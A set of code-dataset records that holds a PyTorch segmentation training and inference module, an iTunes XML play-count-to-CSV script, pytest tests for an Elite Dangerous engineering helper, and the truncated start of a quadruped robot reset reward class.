torch.device(self.training_parameters['device'])\n criterion = getattr(torch_modules, self.training_parameters['loss_function'])(**self.training_parameters['loss_args'])\n\n if self.model_parameters['model_module'] in ['smp', 'monai']:\n model = torch_modules.SemanticSegmentationModel(\n self.model_parameters['model_module'],\n self.model_parameters['model_class'],\n self.model_parameters['model_args']\n )\n elif self.model_parameters['model_module'] == 'transformers':\n model = torch_modules.HuggingFaceTransformersModel(\n self.model_parameters['model_class'],\n self.model_parameters['model_args'],\n self.model_parameters['upsample_args']\n )\n elif self.model_parameters['model_module'] == 'unet_daformer':\n model = torch_modules.UNetDAFormerModel(**self.model_parameters['model_args'])\n elif self.model_parameters['model_module'] == 'coat_daformer':\n model = torch_modules.CoaTDAFormer(**self.model_parameters['model_args'])\n else:\n raise 
ValueError('Invalid Model Module')\n\n if self.model_parameters['model_checkpoint_path'] is not None:\n model.load_state_dict(torch.load(self.model_parameters['model_checkpoint_path']))\n model.to(device)\n\n # Set optimizer, learning rate scheduler and stochastic weight averaging\n optimizer = getattr(optim, self.training_parameters['optimizer'])(model.parameters(), **self.training_parameters['optimizer_args'])\n scheduler = getattr(optim.lr_scheduler, self.training_parameters['lr_scheduler'])(optimizer, **self.training_parameters['lr_scheduler_args'])\n if self.training_parameters['swa_start_epoch'] > 0:\n swa_model = swa_utils.AveragedModel(model, device=device)\n swa_scheduler = swa_utils.SWALR(\n optimizer,\n swa_lr=self.training_parameters['swa_lr'],\n anneal_epochs=self.training_parameters['swa_anneal_epochs'],\n anneal_strategy=self.training_parameters['swa_anneal_strategy'],\n last_epoch=-1\n )\n else:\n swa_model = None\n swa_scheduler = None\n\n early_stopping = False\n summary = {\n 'train_loss': [],\n 'val_loss': [],\n 'val_dice_coefficient': [],\n 'val_intersection_over_union': []\n }\n\n for epoch in range(1, self.training_parameters['epochs'] + 1):\n\n if early_stopping:\n break\n\n if self.training_parameters['lr_scheduler'] == 'ReduceLROnPlateau':\n # Step on validation loss if learning rate scheduler is ReduceLROnPlateau\n train_loss = self.train(train_loader, model, criterion, optimizer, device, scheduler=None)\n val_loss, val_dice_coefficients, val_intersection_over_unions = self.validate(val_loader, model, criterion, device)\n scheduler.step(val_loss)\n else:\n # Learning rate scheduler works in training function if it is not ReduceLROnPlateau\n train_loss = self.train(train_loader, model, criterion, optimizer, device, scheduler)\n val_loss, val_dice_coefficients, val_intersection_over_unions = self.validate(val_loader, model, criterion, device)\n\n if self.training_parameters['swa_start_epoch'] > 0:\n if epoch >= self.training_parameters['swa_start_epoch']:\n swa_model.update_parameters(model)\n swa_scheduler.step()\n\n logging.info(\n f'''\n Epoch {epoch} - Training Loss: {train_loss:.4f} Validation Loss: {val_loss:.4f}\n Dice Coefficients: {val_dice_coefficients[0]} (Mean Dice Coefficient {val_dice_coefficients[1]:.4f})\n Intersection over Unions: {val_intersection_over_unions[0]} (Mean Intersection over Union {val_intersection_over_unions[1]:.4f})\n '''\n )\n\n if epoch in self.persistence_parameters['save_epoch_model']:\n # Save model if current epoch is specified to be saved\n torch.save(model.state_dict(), model_root_directory / f'model_{fold}_epoch_{epoch}.pt')\n logging.info(f'Saved model_{fold}_epoch_{epoch}.pt to {model_root_directory}')\n\n best_val_loss = np.min(summary['val_loss']) if len(summary['val_loss']) > 0 else np.inf\n if val_loss < best_val_loss:\n # Save model if validation loss improves\n if self.persistence_parameters['save_best_model']:\n torch.save(model.state_dict(), model_root_directory / f'model_{fold}_best.pt')\n logging.info(f'Saved model_{fold}_best.pt to {model_root_directory} (validation loss decreased from {best_val_loss:.6f} to {val_loss:.6f})')\n\n # Save epoch predictions visualizations if validation loss improves\n if self.persistence_parameters['visualize_epoch_predictions']:\n\n model.eval()\n\n # Create directory for epoch predictions visualizations\n epoch_predictions_directory = Path(model_root_directory / 'epoch_predictions')\n epoch_predictions_directory.mkdir(parents=True, exist_ok=True)\n\n # Sample single image for 
every organ type from training set with fixed random seed for evaluating epochs\n np.random.seed(self.training_parameters['random_state'])\n df_evaluation = pd.concat((\n df_train.loc[val_idx, :].groupby('organ').sample(1),\n df_test\n ), ignore_index=True, axis=0)\n\n for idx, row in df_evaluation.iterrows():\n\n if row['data_source'] == 'HPA' or row['data_source'] == 'Hubmap':\n evaluation_image = tifffile.imread(row['image_filename'])\n elif row['data_source'] == 'GTEx':\n evaluation_image = cv2.imread(row['image_filename'])\n else:\n raise ValueError(f'Invalid data source: {row[\"data_source\"]}')\n\n if idx != (df_evaluation.shape[0] - 1):\n evaluation_ground_truth_mask = annotation_utils.decode_rle_mask(rle_mask=row['rle'], shape=evaluation_image.shape[:2])\n if row['data_source'] == 'Hubmap' or row['data_source'] == 'HPA':\n evaluation_ground_truth_mask = evaluation_ground_truth_mask.T\n else:\n evaluation_ground_truth_mask = None\n\n evaluation_inputs = dataset_transforms['val'](image=evaluation_image)['image'].float()\n evaluation_inputs = evaluation_inputs.to(device)\n\n with torch.no_grad():\n evaluation_outputs = model(torch.unsqueeze(evaluation_inputs, dim=0))\n\n evaluation_predictions_mask = torch.sigmoid(torch.squeeze(torch.squeeze(evaluation_outputs.detach().cpu(), dim=0), dim=0)).numpy().astype(np.float32)\n # Resize evaluation predictions mask back to its original size and evaluate it on multiple thresholds\n evaluation_predictions_mask = cv2.resize(evaluation_predictions_mask, (evaluation_image.shape[1], evaluation_image.shape[0]), interpolation=cv2.INTER_CUBIC)\n evaluation_summary = evaluation.evaluate_predictions(\n ground_truth=evaluation_ground_truth_mask,\n predictions=evaluation_predictions_mask,\n threshold=self.inference_parameters['label_thresholds'][row['data_source']][row['organ']],\n thresholds=self.inference_parameters['label_threshold_range']\n )\n\n # Convert evaluation predictions mask's soft predictions to labels and visualize it\n evaluation_predictions_mask = metrics.soft_predictions_to_labels(x=evaluation_predictions_mask, threshold=self.inference_parameters['label_thresholds'][row['data_source']][row['organ']])\n visualization.visualize_predictions(\n image=evaluation_image,\n ground_truth=evaluation_ground_truth_mask,\n predictions=evaluation_predictions_mask,\n metadata=row.to_dict(),\n evaluation_summary=evaluation_summary,\n path=epoch_predictions_directory / f'{row[\"id\"]}_{row[\"organ\"]}_{fold}_epoch{epoch}_{val_loss:.4f}_predictions.png'\n )\n\n logging.info(f'Saved {fold} epoch {epoch} predictions to {epoch_predictions_directory}')\n\n summary['train_loss'].append(train_loss)\n summary['val_loss'].append(val_loss)\n summary['val_dice_coefficient'].append(np.median(list(val_dice_coefficients[0].values())))\n summary['val_intersection_over_union'].append(np.median(list(val_intersection_over_unions[0].values())))\n\n best_epoch = np.argmin(summary['val_loss'])\n if self.training_parameters['early_stopping_patience'] > 0:\n # Trigger early stopping if early stopping patience is greater than 0\n if len(summary['val_loss']) - best_epoch >= self.training_parameters['early_stopping_patience']:\n logging.info(\n f'''\n Early Stopping (validation loss didn\\'t improve for {self.training_parameters[\"early_stopping_patience\"]} epochs)\n Best Epoch ({best_epoch + 1}) Validation Loss: {summary[\"val_loss\"][best_epoch]:.6f} Dice Coefficient: {summary[\"val_dice_coefficient\"][best_epoch]:.4f} Intersection over Union: 
{summary[\"val_intersection_over_union\"][best_epoch]:.4f}\n '''\n )\n early_stopping = True\n scores.append({\n 'val_loss': summary['val_loss'][best_epoch],\n 'val_dice_coefficient': summary['val_dice_coefficient'][best_epoch],\n 'val_intersection_over_union': summary['val_intersection_over_union'][best_epoch]\n })\n else:\n if epoch == self.training_parameters['epochs']:\n scores.append({\n 'val_loss': summary['val_loss'][-1],\n 'val_dice_coefficient': summary['val_dice_coefficient'][-1],\n 'val_intersection_over_union': summary['val_intersection_over_union'][-1]\n })\n\n if self.persistence_parameters['visualize_learning_curve']:\n visualization.visualize_learning_curve(\n training_losses=summary['train_loss'],\n validation_losses=summary['val_loss'],\n path=model_root_directory / f'learning_curve_{fold}.png'\n )\n logging.info(f'Saved learning_curve_{fold}.png to {model_root_directory}')\n\n if self.training_parameters['swa_start_epoch'] > 0:\n # Perform one pass over data to estimate the activation statistics for batch normalization layers in the model\n swa_utils.update_bn(train_loader, swa_model, device=device)\n\n df_scores = pd.DataFrame(scores)\n for score_idx, row in df_scores.iterrows():\n logging.info(f'Fold {int(score_idx) + 1} - Validation Scores: {json.dumps(row.to_dict(), indent=2)}')\n logging.info(f'\\nMean Validation Scores: {json.dumps(df_scores.mean(axis=0).to_dict(), indent=2)} (±{json.dumps(df_scores.std(axis=0).to_dict(), indent=2)})')\n\n if self.persistence_parameters['visualize_training_scores']:\n visualization.visualize_scores(\n df_scores=df_scores,\n path=model_root_directory / f'training_scores.png'\n )\n logging.info(f'Saved training_scores.png to {model_root_directory}')\n\n def inference(self, df_train):\n\n \"\"\"\n Inference on inputs and targets listed on given dataframes with specified configuration and transforms\n\n Parameters\n ----------\n df_train (pandas.DataFrame of shape (n_rows, n_columns)): Dataframe of filenames, targets and folds\n \"\"\"\n\n logging.info(f'\\n{\"-\" * 30}\\nRunning {self.persistence_parameters[\"name\"]} Model for Inference - Seed: {self.training_parameters[\"random_state\"]}\\n{\"-\" * 30}\\n')\n\n # Create directory for models and visualizations\n model_root_directory = Path(settings.MODELS / self.persistence_parameters['name'])\n model_root_directory.mkdir(parents=True, exist_ok=True)\n # Create directory for final predictions visualizations\n final_predictions_directory = Path(model_root_directory / 'final_predictions')\n final_predictions_directory.mkdir(parents=True, exist_ok=True)\n\n dataset_transforms = transforms.get_semantic_segmentation_transforms(**self.transform_parameters)\n\n for fold in self.inference_parameters['folds']:\n\n val_idx = df_train.loc[df_train[fold] == 1].index\n logging.info(f'\\n{fold} - Validation {len(val_idx)} ({len(val_idx) // self.training_parameters[\"test_batch_size\"] + 1} steps)')\n\n # Set model, loss function, device and seed for reproducible results\n torch_utils.set_seed(self.training_parameters['random_state'], deterministic_cudnn=self.training_parameters['deterministic_cudnn'])\n device = torch.device(self.training_parameters['device'])\n if self.model_parameters['model_module'] in ['smp', 'monai']:\n model = torch_modules.SemanticSegmentationModel(\n self.model_parameters['model_module'],\n self.model_parameters['model_class'],\n self.model_parameters['model_args']\n )\n elif self.model_parameters['model_module'] == 'transformers':\n model = 
torch_modules.HuggingFaceTransformersModel(\n self.model_parameters['model_class'],\n self.model_parameters['model_args'],\n self.model_parameters['upsample_args']\n )\n elif self.model_parameters['model_module'] == 'unet_daformer':\n model = torch_modules.UNetDAFormerModel(**self.model_parameters['model_args'])\n elif self.model_parameters['model_module'] == 'coat_daformer':\n model = torch_modules.CoaTDAFormer(**self.model_parameters['model_args'])\n else:\n raise ValueError('Invalid Model Module')\n\n model.load_state_dict(torch.load(model_root_directory / f'model_{fold}_best.pt'))\n model.to(device)\n model.eval()\n\n for idx, row in tqdm(df_train.loc[val_idx, :].iterrows(), total=len(val_idx)):\n\n if row['data_source'] == 'HPA' or row['data_source'] == 'Hubmap':\n image = tifffile.imread(row['image_filename'])\n elif row['data_source'] == 'GTEx':\n image = cv2.imread(row['image_filename'])\n else:\n raise ValueError(f'Invalid data source: {row[\"data_source\"]}')\n\n image_resized = cv2.resize(\n image,\n dsize=self.inference_parameters['size'][row['data_source']][row['organ']],\n interpolation=cv2.INTER_CUBIC\n )\n\n if self.inference_parameters['tta']:\n # Stack augmented images on batch dimension\n inputs = [\n image_resized,\n test_time_augmentations.horizontal_flip(image_resized),\n test_time_augmentations.vertical_flip(image_resized),\n test_time_augmentations.horizontal_flip(test_time_augmentations.vertical_flip(image_resized))\n ]\n inputs = torch.cat([\n torch.unsqueeze(dataset_transforms['test'](image=image)['image'], dim=0)\n for image in inputs\n ], dim=0)\n else:\n inputs = torch.unsqueeze(dataset_transforms['test'](image=image_resized)['image'], dim=0)\n\n inputs = inputs.to('cuda')\n\n with torch.no_grad():\n outputs = model(inputs)\n\n predictions_mask = outputs.detach().cpu()\n predictions_mask = torch.sigmoid(torch.squeeze(predictions_mask, dim=1)).numpy().astype(np.float32)\n\n if self.inference_parameters['tta']:\n # Apply inverse of test-time augmentations and aggregate predictions\n predictions_mask[1, :, :] = test_time_augmentations.horizontal_flip(predictions_mask[1, :, :])\n predictions_mask[2, :, :] = test_time_augmentations.vertical_flip(predictions_mask[2, :, :])\n predictions_mask[3, :, :] = test_time_augmentations.horizontal_flip(test_time_augmentations.vertical_flip(predictions_mask[3, :, :]))\n predictions_mask = np.mean(predictions_mask, axis=0)\n\n # Decode RLE mask string into 2d binary semantic segmentation mask array\n ground_truth_mask = annotation_utils.decode_rle_mask(rle_mask=row['rle'], shape=image.shape[:2])\n if row['data_source'] == 'Hubmap' or row['data_source'] == 'HPA':\n ground_truth_mask = ground_truth_mask.T\n\n # Resize predictions mask back to its original size and evaluate it\n predictions_mask = cv2.resize(predictions_mask, (image.shape[1], image.shape[0]), interpolation=cv2.INTER_CUBIC)\n predictions_evaluation_summary = evaluation.evaluate_predictions(\n ground_truth=ground_truth_mask,\n predictions=predictions_mask,\n threshold=self.inference_parameters['label_thresholds'][row['data_source']][row['organ']],\n thresholds=self.inference_parameters['label_threshold_range'])\n\n if self.persistence_parameters['evaluate_final_predictions']:\n with open(final_predictions_directory / f'{row[\"id\"]}_evaluation.json', mode='w') as f:\n json.dump(predictions_evaluation_summary, f, indent=2)\n\n df_train.loc[df_train['id'] == row['id'], 'dice_coefficient'] = predictions_evaluation_summary['scores']['dice_coefficient']\n 
df_train.loc[df_train['id'] == row['id'], 'intersection_over_union'] = predictions_evaluation_summary['scores']['intersection_over_union']\n\n try:\n label_threshold = self.inference_parameters['label_thresholds'][row['data_source']][row['organ']]\n except KeyError:\n # Set label threshold to 0.1 for unseen organs or data sources\n label_threshold = 0.1\n\n # Convert evaluation predictions mask's soft predictions to labels\n predictions_mask = metrics.soft_predictions_to_labels(x=predictions_mask, threshold=label_threshold)\n\n if self.persistence_parameters['visualize_final_predictions']:\n visualization.visualize_predictions(\n image=image,\n ground_truth=ground_truth_mask,\n predictions=predictions_mask,\n metadata=row.to_dict(),\n evaluation_summary=predictions_evaluation_summary,\n path=final_predictions_directory / f'{row[\"id\"]}_{row[\"organ\"]}_predictions.png'\n )\n\n logging.info(f'Saved predictions evaluation summaries and predictions visualizations to {final_predictions_directory}')\n\n scores_evaluation_summary = evaluation.evaluate_scores(df=df_train, folds=self.inference_parameters['folds'])\n logging.info(json.dumps(scores_evaluation_summary, indent=2))\n with open(model_root_directory / f'inference_scores.json', mode='w') as f:\n json.dump(scores_evaluation_summary, f, indent=2)\n\n logging.info(f'Saved inference_scores.json to {model_root_directory}')\n","repo_name":"gunesevitan/hubmap-hpa-hacking-the-human-body","sub_path":"src/torch_trainers.py","file_name":"torch_trainers.py","file_ext":"py","file_size_in_byte":29690,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"36792274006","text":"\"\"\"Extract play-count information form itunes xml.\"\"\"\nfrom lxml import etree\nimport argparse\nimport sys\nfrom tqdm import tqdm\nimport csv\nfrom pprint import pprint\nimport os\nfrom datetime import datetime\n\n\nclass ItunesXml(object):\n \"\"\"Object to interact with itunes xml.\"\"\"\n\n def __init__(self, path):\n \"\"\"Open itunes xml file.\"\"\"\n self.path = path\n\n def extract_plays(self, output=None):\n \"\"\"Extract play information from xml.\n\n kwargs:\n output(str): format to deliver results in; currently\n only accepted value is csv.\n \"\"\"\n self.output = output\n self.play_count_data = []\n self._load_xml()\n\n def _build_csv(self):\n \"\"\"Use list of song data to generate scrobble-friendly csv.\"\"\"\n self.csv = []\n for record in tqdm(self.play_count_data):\n if self._unplayed(record):\n pass\n else:\n self.csv += self._get_row_data(record)\n # pprint(self.csv[0:6])\n self._store_csv()\n\n def _store_csv(self):\n csv_path = self._get_csv_path()\n with open(csv_path, \"w\") as csvfile:\n fieldnames = [\"artist\", \"song\", \"album\",\n \"timestamp\", \"album_artist\", \"duration\"]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n for row in tqdm(self.csv):\n writer.writerow(row)\n print(\"Wrote file at {0}\".format(csv_path))\n\n def _get_csv_path(self):\n \"\"\"Store csv file next to source xml.\"\"\"\n return os.path.splitext(self.path)[0] + \".csv\"\n\n def _unplayed(self, record):\n \"\"\"Check if song has been played.\n\n args:\n record(dict): full record for a given song\n \"\"\"\n return \"Play Count\" not in record or record.get(\"Play Count\", \"0\") == \"0\"\n\n def _get_row_data(self, record):\n \"\"\"Produce rows for each play of the supplied track.\n\n args:\n record(dict): all track data\n \"\"\"\n rdata = []\n artist = record.get(\"Artist\", \"\")\n album_artist = 
record.get(\"Album Artist\", \"\")\n song = record[\"Name\"]\n album = record.get(\"Album\", \"\")\n play_count = record[\"Play Count\"]\n duration = int(record[\"Total Time\"]) / 1000\n last_play = record[\"Play Date UTC\"]\n date_added = record[\"Date Added\"]\n playtimes = self._get_playtimes(date_added, last_play, int(play_count))\n for playtime in playtimes:\n playdata = {\"artist\": artist,\n \"song\": song,\n \"album\": album,\n \"timestamp\": playtime,\n \"album_artist\": album_artist,\n \"duration\": duration\n }\n rdata.append(playdata)\n return rdata\n\n def _get_playtimes(self, add_date, play_date, plays):\n \"\"\"Get play dates for tracks.\n\n Play times will be generated using average interval\n between date the track was added and its most recent play.\n\n args:\n add_date(str): UTC formatted date string\n play_date(str): UTC formatted date string\n plays(int): play count\n \"\"\"\n play_date = datetime.strptime(play_date, \"%Y-%m-%dT%H:%M:%SZ\")\n if plays == \"1\":\n playtimes = [datetime.strftime(play_date, \"%Y-%m-%d %H:%m:%S\")]\n else:\n add_date = datetime.strptime(add_date, \"%Y-%m-%dT%H:%M:%SZ\")\n # Split plays evenly over elapsed time between adding tack and most\n # recent play.\n interval = (play_date - add_date) / plays\n playtimes = []\n for i in range(plays):\n play_time = add_date + interval * (i + 1)\n playtimes.append(datetime.strftime(play_time, \"%Y-%m-%d %H:%m:%S\"))\n return playtimes\n\n def _load_xml(self):\n \"\"\"Begin xml pipeline.\"\"\"\n self._xml = etree.parse(self.path)\n print(\"Loading XML...\")\n self._load_songs()\n\n def _load_songs(self):\n \"\"\"Find and load song trees.\"\"\"\n self._songs = self._xml.xpath(\"/plist/dict/dict/dict\")\n self._process_songs()\n\n def _process_songs(self):\n \"\"\"Iterate through songs.\"\"\"\n print(\"Processing songs...\")\n for song in tqdm(self._songs):\n self._song_data = {}\n self._process_song(song)\n self.play_count_data.append(self._song_data)\n print(\"Found data for {0} songs\".format(len(self.play_count_data)))\n # pprint(self.play_count_data[0])\n self._build_output()\n\n def _build_output(self):\n \"\"\"Output results to user.\"\"\"\n if self.output == \"csv\":\n self._build_csv()\n\n def _process_song(self, song):\n \"\"\"Process individual song data.\n\n args:\n song(etreeElement): lxml Element type of the song level,\n including descendents.\n \"\"\"\n for elem in song.iterchildren():\n self._process_element(elem)\n\n def _process_element(self, elem):\n \"\"\"Isolate and store element.\n\n Each elem should have a tag named either 'key' or the format of data\n stored in the value described by the key. 
See xml sample below for details.\n\n        args:\n            elem(etreeElement): tree for each\n        \"\"\"\n        if elem.tag == \"key\":\n            self._current_key = elem.text\n        else:\n            value = elem.text\n            self._song_data[self._current_key] = value\n\n\ndef process_args(args=None):\n    \"\"\"Process command line arguments from user.\n\n    kwargs:\n        args(list): list of args passed by user.\n    \"\"\"\n    desc = \"Extract play count data from iTunes XML library data.\"\n    parser = argparse.ArgumentParser(description=desc)\n    parser.add_argument(\"path_to_xml\",\n                        help=\"Path to valid iTunes library XML file.\",\n                        metavar=\"path_to_xml\")\n    parser.add_argument(\"-o\", \"--output\",\n                        help=\"Desired output format.\",\n                        default=None,\n                        dest=\"output_format\",\n                        metavar=\"output_format\",\n                        choices=[\"csv\"])\n    return parser.parse_args(args)\n\n\nif __name__ == \"__main__\":\n    arg = process_args(sys.argv[1:])\n    ixml = ItunesXml(arg.path_to_xml)\n    ixml.extract_plays(output=arg.output_format)\n\n\n# XML Data Sample\n\n\"\"\"\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>Major Version</key><integer>1</integer>\n <key>Minor Version</key><integer>1</integer>\n <key>Date</key><date>2011-12-14T06:49:42Z</date>\n <key>Application Version</key><string>10.5.1</string>\n <key>Features</key><integer>5</integer>\n <key>Show Content Ratings</key><true/>\n <key>Music Folder</key><string>file://localhost/C:/Users/Devin/Music/</string>\n <key>Library Persistent ID</key><string>CBE4B2A8B3CCB499</string>\n <key>Tracks</key>\n <dict>\n  <key>4138</key>\n  <dict>\n   <key>Track ID</key><integer>4138</integer>\n   <key>Name</key><string>Warped Mind</string>\n   <key>Artist</key><string>Shed</string>\n   <key>Album Artist</key><string>va</string>\n   <key>Album</key><string>Berghain 02 Part I</string>\n   <key>Grouping</key><string>ostgut tonträger</string>\n   <key>Genre</key><string>Techno</string>\n   <key>Kind</key><string>MPEG audio file</string>\n   <key>Size</key><integer>17639662</integer>\n   <key>Total Time</key><integer>432875</integer>\n   <key>Year</key><integer>2008</integer>\n   <key>Date Modified</key><date>2009-05-30T00:09:46Z</date>\n   <key>Date Added</key><date>2009-05-26T05:12:24Z</date>\n   <key>Bit Rate</key><integer>320</integer>\n   <key>Sample Rate</key><integer>44100</integer>\n   <key>Play Count</key><integer>5</integer>\n   <key>Play Date</key><integer>3401878234</integer>\n   <key>Play Date UTC</key><date>2011-10-19T20:10:34Z</date>\n   <key>Skip Count</key><integer>1</integer>\n   <key>Skip Date</key><date>2009-12-23T20:32:51Z</date>\n   <key>Artwork Count</key><integer>1</integer>\n   <key>Persistent ID</key><string>BB925F8B0C12246C</string>\n   <key>Track Type</key><string>File</string>\n   <key>Location</key><string>file://localhost/mind.mp3</string>\n   <key>File Folder Count</key><integer>-1</integer>\n   <key>Library Folder Count</key><integer>-1</integer>\n  </dict>\n </dict>\n</dict>\n</plist>\n\"\"\"\n\n# Individual Output (Python Dict)\n\n\"\"\"\n{'Album': 'Berghain 02 Part I',\n 'Album Artist': 'va',\n 'Artist': 'Shed',\n 'Artwork Count': '1',\n 'Bit Rate': '320',\n 'Date Added': '2009-05-26T05:12:24Z',\n 'Date Modified': '2009-05-30T00:09:46Z',\n 'File Folder Count': '-1',\n 'Genre': 'Techno',\n 'Grouping': 'ostgut tonträger',\n 'Kind': 'MPEG audio file',\n 'Library Folder Count': '-1',\n 'Location': 'file://localhost/D:/music/Music/va/Berghain%2002%20Part%20I/Warped%20Mind.mp3',\n 'Name': 'Warped Mind',\n 'Persistent ID': 'BB925F8B0C12246C',\n 'Play Count': '5',\n 'Play Date': '3401878234',\n 'Play Date UTC': '2011-10-19T20:10:34Z',\n 'Sample Rate': '44100',\n 'Size': '17639662',\n 'Skip Count': '1',\n 'Skip Date': '2009-12-23T20:32:51Z',\n 'Total Time': '432875',\n 'Track ID': '4138',\n 'Track Type': 'File',\n 'Year': '2008'}\n \"\"\"\n","repo_name":"devinhiggins/itunesxml","sub_path":"itunesxml.py","file_name":"itunesxml.py","file_ext":"py","file_size_in_byte":9549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28626889297","text":"\"\"\"\nTests the summary of engineers\n\"\"\"\n\nfrom ed_engineer_shopping_list_builder import inputs, utils, summarize_engineers\nfrom ed_engineer_shopping_list_builder.engineers import (\n    LizRyder,\n    LeiCheung,\n    BillTurner,\n    SeleneJean,\n    JuriIshmaak,\n)\nfrom ed_engineer_shopping_list_builder.ship_components import (\n    Armour,\n    DetailedSurfaceScanner,\n    FrameShiftWakeScanner,\n    HullReinforcementPackage,\n    KillWarrantScanner,\n    ManifestScanner,\n    MineLauncher,\n    MissileRack,\n    Sensors,\n    TorpedoPylon,\n)\n\n\ndef test_get_available_engineers(monkeypatch):\n    \"\"\"\n    .\n    \"\"\"\n    
monkeypatch.setattr(\n inputs,\n \"make_choices\",\n lambda *args, **kwargs: [\"Bill Turner\", \"Liz Ryder\", \"Lei Cheung\"],\n )\n assert summarize_engineers.get_available_engineers() == [\n BillTurner,\n LizRyder,\n LeiCheung,\n ], \"Expected engineers returned\"\n\n\ndef test_simplify_components():\n \"\"\"\n .\n \"\"\"\n assert summarize_engineers.simplify_engineer_components(\n [SeleneJean, JuriIshmaak, LizRyder]\n ) == {\n Armour: SeleneJean,\n DetailedSurfaceScanner: JuriIshmaak,\n FrameShiftWakeScanner: JuriIshmaak,\n HullReinforcementPackage: SeleneJean,\n KillWarrantScanner: JuriIshmaak,\n ManifestScanner: JuriIshmaak,\n MineLauncher: JuriIshmaak,\n MissileRack: LizRyder,\n Sensors: JuriIshmaak,\n TorpedoPylon: LizRyder,\n }, \"Correct modifications returned\"\n\n\ndef test_print_summary(monkeypatch, capsys):\n \"\"\"\n .\n \"\"\"\n # pylint: disable=unused-argument\n monkeypatch.setattr(\n utils, \"organize_components_by_classification\", lambda components: []\n )\n monkeypatch.setattr(\n utils,\n \"get_component_summary_by_classification\",\n lambda components, func: \"a description\",\n )\n\n summarize_engineers.print_component_summary({})\n printed = capsys.readouterr()\n assert printed.out == \"a description\\n\", \"Ship summary returned\"\n\n\ndef test_summarize_engineers(monkeypatch):\n \"\"\"\n .\n \"\"\"\n\n # pylint: disable=unused-argument\n @utils.counter_wrapper\n def get_available(*args, **kwargs):\n \"\"\"\n .\n \"\"\"\n\n @utils.counter_wrapper\n def simplify(*args, **kwargs):\n \"\"\"\n .\n \"\"\"\n\n @utils.counter_wrapper\n def print_summary(*args, **kwargs):\n \"\"\"\n .\n \"\"\"\n\n monkeypatch.setattr(summarize_engineers, \"get_available_engineers\", get_available)\n monkeypatch.setattr(summarize_engineers, \"simplify_engineer_components\", simplify)\n monkeypatch.setattr(summarize_engineers, \"print_component_summary\", print_summary)\n\n summarize_engineers.summarize_engineers()\n assert get_available.counter == 1, \"Available engineers returned\"\n assert simplify.counter == 1, \"Simplified components\"\n assert print_summary.counter == 1, \"Printed summary\"\n","repo_name":"ammesonb/ed-engineer-shopping-list-builder","sub_path":"tests/test_summarize_engineers.py","file_name":"test_summarize_engineers.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26820850115","text":"from rail_walker_interface import JoystickPolicyRewardProvider, JoystickPolicyTerminationConditionProvider\nfrom rail_mujoco_walker import JoystickPolicyProviderWithDMControl, add_sphere_to_mjv_scene, add_arrow_to_mjv_scene, JoystickPolicyDMControlTask, RailSimWalkerDMControl, find_dm_control_non_contacting_height\nfrom dm_control.mujoco.engine import Physics as EnginePhysics\nimport mujoco\nimport numpy as np\nfrom typing import Any, Tuple, Optional\nimport transforms3d as tr3d\n\nJOINT_WEIGHTS = np.array([1.0, 0.75, 0.5] * 4)\n\nclass ResetRewardProvider(JoystickPolicyRewardProvider[RailSimWalkerDMControl],JoystickPolicyProviderWithDMControl):\n SUCCESS_RATE_REW_THRES = 0.8\n\n def __init__(\n self,\n use_energy_penalty: bool = False,\n ) -> None:\n JoystickPolicyRewardProvider.__init__(self)\n JoystickPolicyProviderWithDMControl.__init__(self)\n self.use_energy_penalty = use_energy_penalty\n self.rew = 0.0\n self.standup_height : float = None\n \n def get_reward(self) -> float:\n return self.rew\n\n def reset_reward(\n self, \n Robot: RailSimWalkerDMControl, \n info_dict: 
dict[str,Any], \n termination_provider_triggered: JoystickPolicyTerminationConditionProvider,\n randomState: np.random.RandomState\n ) -> None:\n self.rew = 0.0\n info_dict[\"reward_roll\"] = 0.0\n info_dict[\"reward_height\"] = 0.0\n info_dict[\"reward_pose\"] = 0.0\n info_dict[\"reward_qvel\"] = 0.0\n info_dict[\"reward_stand\"] = 0.0\n info_dict[\"cos_dist\"] = 0.0\n info_dict[\"energy\"] = 0.0\n info_dict[\"success_rate\"] = 0.0\n self.standup_height = 0.325\n\n # # Retrieve the target height\n # physics = Robot.mujoco_walker._last_physics\n # # Remember the previous state of the robot\n # prev_joint = Robot.get_joint_qpos()\n # prev_pos, prev_quat = Robot.mujoco_walker.get_pose(physics)\n # # Set the robot to standup pose\n # find_dm_control_non_contacting_height(physics, Robot.mujoco_walker, prev_pos[0], prev_pos[1], Robot.joint_qpos_init, prev_quat)\n # self.standup_height = Robot.mujoco_walker.get_position(physics)[2] # retrieve the height of the robot\n # # reset the robot back to previous state\n # with physics.reset_context():\n # Robot.mujoco_walker.set_pose(physics, prev_pos, prev_quat)\n # physics.bind(Robot.mujoco_walker.joints).qpos[:] = prev_joint\n # #print(\"Standup height: \", self.standup_height)\n\n def _log_success_rate(\n self, \n info_dict: dict[str,Any], \n rew_roll : float,\n rew_height : float,\n rew_pose : float\n ) -> None:\n if rew_roll > __class__.SUCCESS_RATE_REW_THRES and rew_height > __class__.SUCCESS_RATE_REW_THRES and rew_pose > __class__.SUCCESS_RATE_REW_THRES:\n info_dict[\"success_rate\"] = 1.0\n else:\n info_dict[\"success_rate\"] = 0.0\n\n def _calc_reward_roll(\n self,\n Robot: RailSimWalkerDMControl\n ) -> Tuple[float, float]:\n cos_dist = tr3d.quaternions.quat2mat(Robot.get_framequat_wijk())[-1,-1] # See if the z-axis is pointing up\n r_roll = (0.5 * cos_dist + 0.5)**2\n return r_roll, cos_dist\n\n def _calc_reward_stand(\n self,\n Robot: RailSimWalkerDMControl\n ) -> float:\n # height match reward\n tar_h = self.standup_height\n # root_h = Robot.get_root_height()\n root_h = Robot.get_3d_location()[-1]\n # root_h = physics.bind(self._robot.root_body).xpos[-1]\n h_err = tar_h - root_h\n h_err /= tar_h\n h_err = np.clip(h_err, 0.0, 1.0)\n r_height = 1.0 - h_err\n\n # pose match reward\n joint_pose = Robot.get_joint_qpos()\n tar_pose = Robot.joint_qpos_init\n pose_diff = tar_pose - joint_pose\n pose_diff = JOINT_WEIGHTS * JOINT_WEIGHTS * pose_diff * pose_diff\n 